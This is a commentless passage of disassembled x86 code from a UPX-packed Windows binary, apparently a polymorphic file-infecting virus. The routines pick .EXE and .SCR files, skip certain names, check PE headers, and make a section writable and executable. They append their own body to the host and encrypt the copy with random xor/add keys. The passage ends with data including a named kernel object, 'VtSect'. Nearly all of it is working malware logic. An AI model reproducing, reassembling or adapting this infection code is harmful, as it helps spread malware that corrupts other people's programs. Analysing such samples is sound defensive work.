locret_3144243C: ; CODE XREF: sub_31442400:loc_31442405�j
; sub_31442400+1D�j ...
retn
sub_31442400 endp
; =============== S U B R O U T I N E =======================================
sub_3144243D proc near ; CODE XREF: UPX2:314424D5�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3144243D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3144244A: ; CODE XREF: UPX2:3144246B�j
mov ecx, edi
jmp short loc_31442459
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_31442455: ; CODE XREF: UPX2:31442467�j
mov ebx, edi
xor ecx, ecx
loc_31442459: ; CODE XREF: UPX2:3144244C�j
; UPX2:3144246F�j
lodsb
cmp al, 61h
jb short loc_31442464
cmp al, 7Ah
ja short loc_31442464
sub al, 20h
loc_31442464: ; CODE XREF: UPX2:3144245C�j
; UPX2:31442460�j
stosb
cmp al, 5Ch
jz short loc_31442455
cmp al, 2Eh
jz short loc_3144244A
cmp al, 0
jnz short loc_31442459
jecxz short locret_3144243C
mov eax, [ecx]
cmp eax, 455845h
jz short loc_31442487
cmp eax, 524353h
jnz locret_314423BA
loc_31442487: ; CODE XREF: UPX2:3144247A�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_314423BA
cmp eax, 4E554357h
jz locret_314423BA
cmp eax, 32334357h
jz locret_314423BA
cmp eax, 4F545350h
jz locret_314423BA
xor ebx, ebx
call sub_314422E9
jnz short loc_314424CE
call sub_314421BD
call sub_314422E9
jz locret_314423BA
loc_314424CE: ; CODE XREF: UPX2:314424BC�j
xor edx, edx
call sub_314424EB
call sub_3144243D
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_314428E5
; =============== S U B R O U T I N E =======================================
sub_314424EB proc near ; CODE XREF: UPX2:314424D0�p
var_1C = dword ptr -1Ch
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_314428E5
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_314428E5
test dword ptr [ebx+16h], 2000h
jnz loc_314428E5
test byte ptr [ebx+5Ch], 2
jz loc_314428E5
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_314428E5
cmp eax, 20202020h
jz loc_314428E5
mov ecx, [ebx+0C8h]
jecxz short loc_31442560
push ecx
call near ptr dword_314414A0+4
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_31442560: ; CODE XREF: sub_314424EB+5D�j
call sub_31442400
jb loc_314428E5
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_31442580
xor eax, eax
jmp short loc_31442585
; ---------------------------------------------------------------------------
loc_31442580: ; CODE XREF: sub_314424EB+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_31442585: ; CODE XREF: sub_314424EB+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_31440BE0+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_314425A7: ; CODE XREF: sub_314424EB+D5�j
push 20h
dec cl
pop eax
js short loc_314425C2
call near ptr dword_31440BE0+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_314425A7
; ---------------------------------------------------------------------------
loc_314425C2: ; CODE XREF: sub_314424EB+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_314425F0
test dword ptr [ebp+1039C0h], 3
jnz short loc_314425E6
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_314425F0
; ---------------------------------------------------------------------------
loc_314425E6: ; CODE XREF: sub_314424EB+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_314425F0: ; CODE XREF: sub_314424EB+E1�j
; sub_314424EB+F9�j ...
push 6
pop ecx
loc_314425F6: ; CODE XREF: sub_314424EB+129�j
push 6
pop eax
call near ptr dword_31440BE0+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_314425F6
test dword ptr [ebp+1039C0h], 8
jnz short loc_3144262B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_314425F0
loc_3144262B: ; CODE XREF: sub_314424EB+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_31442652
cmp byte ptr [ebp+1039B8h], 5
jz short loc_314425F0
cmp byte ptr [ebp+1039B9h], 5
jz short loc_314425F0
cmp byte ptr [ebp+1039BAh], 5
jz short loc_314425F0
loc_31442652: ; CODE XREF: sub_314424EB+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_31442667
cmp byte ptr [ebp+1039B8h], 2
ja short loc_314425F0
loc_31442667: ; CODE XREF: sub_314424EB+171�j
and dword ptr [ebp+104300h], 0
call loc_314418E5
call loc_314423BB
call sub_314428EE
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_314422E9
jz loc_314428E5
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_31442400
jb loc_314428E5
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_314426DB
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_314426DB: ; CODE XREF: sub_314424EB+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_314426EF
rep movsb
loc_314426EF: ; CODE XREF: sub_314424EB+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_314427AD
push dword ptr [ebx+28h]
call near ptr dword_314414A0+4
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_314427AD
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3144272C
xor ecx, ecx
loc_3144272C: ; CODE XREF: sub_314424EB+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_31442793
mov edi, [esp+1Ch+var_1C]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3144276C
neg dword ptr [eax]
loc_3144276C: ; CODE XREF: sub_314424EB+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_3144278A
neg dword ptr [eax]
loc_3144278A: ; CODE XREF: sub_314424EB+29B�j
push ecx
call loc_314423BB
pop ecx
jmp short loc_3144279F
; ---------------------------------------------------------------------------
loc_31442793: ; CODE XREF: sub_314424EB+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3144279F: ; CODE XREF: sub_314424EB+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_314427AD: ; CODE XREF: sub_314424EB+20E�j
; sub_314424EB+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_314427C6
imul edx, 12345678h
loc_314427C6: ; CODE XREF: sub_314424EB+2D3�j
mov [eax-19h], dx
call sub_314401B0
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_314427F8
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_314427F8: ; CODE XREF: sub_314424EB+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_31442814
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_31442814: ; CODE XREF: sub_314424EB+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_31442827
push edx
call sub_31441F81
pop edx
loc_31442827: ; CODE XREF: sub_314424EB+333�j
mov ecx, [ebp+104300h]
jecxz short loc_31442834
mov [ebx+28h], ecx
jmp short loc_31442841
; ---------------------------------------------------------------------------
loc_31442834: ; CODE XREF: sub_314424EB+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_3144283E
jmp short loc_31442841
; ---------------------------------------------------------------------------
loc_3144283E: ; CODE XREF: sub_314424EB+34F�j
mov ecx, [ebx+28h]
loc_31442841: ; CODE XREF: sub_314424EB+347�j
; sub_314424EB+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_31442861
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_31442861: ; CODE XREF: sub_314424EB+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_31442872
mov [edx+8], ecx
loc_31442872: ; CODE XREF: sub_314424EB+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_314428A3
add ecx, [ebp+101069h]
loc_314428A3: ; CODE XREF: sub_314424EB+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_314428C5
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_314428C5
mov dh, [ebp+1039BFh]
loc_314428C5: ; CODE XREF: sub_314424EB+3C4�j
; sub_314424EB+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_314428DC
loc_314428D1: ; CODE XREF: sub_314424EB+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_314428D1
jmp short loc_314428E5
; ---------------------------------------------------------------------------
loc_314428DC: ; CODE XREF: sub_314424EB+3E4�j
; sub_314424EB+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_314428DC
loc_314428E5: ; CODE XREF: UPX2:314424E6�j
; sub_314424EB+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_314424EB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_314428EE proc near ; CODE XREF: sub_314424EB+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_314423BA
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_31442907: ; CODE XREF: sub_314422E9+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_3144292F: ; CODE XREF: sub_314422E9+6B�j
; sub_314422E9+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_3144293B: ; CODE XREF: sub_314422E9+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_314428EE endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 3060102h, 0B6070705h
dd 625D620h, 119815FFh, 0FF8B0100h, 119h dup(0)
aBasenamedobjec:
unicode 0, <\BaseNamedObjects\VtSect>,0
dw 9B47h
dd 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 0ABDE7C80h
dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h
dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h
dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h, 3F587C86h
dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h
dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h
dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h
dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 14h dup(0)
dd 320030h, 3144301Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 740056h
dd 650053h, 740063h, 0D3h dup(0)
dd 7FFDF000h, 1319h dup(0)
UPX2 ends
; Section 4. (virtual address 00028000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00028000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31448000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start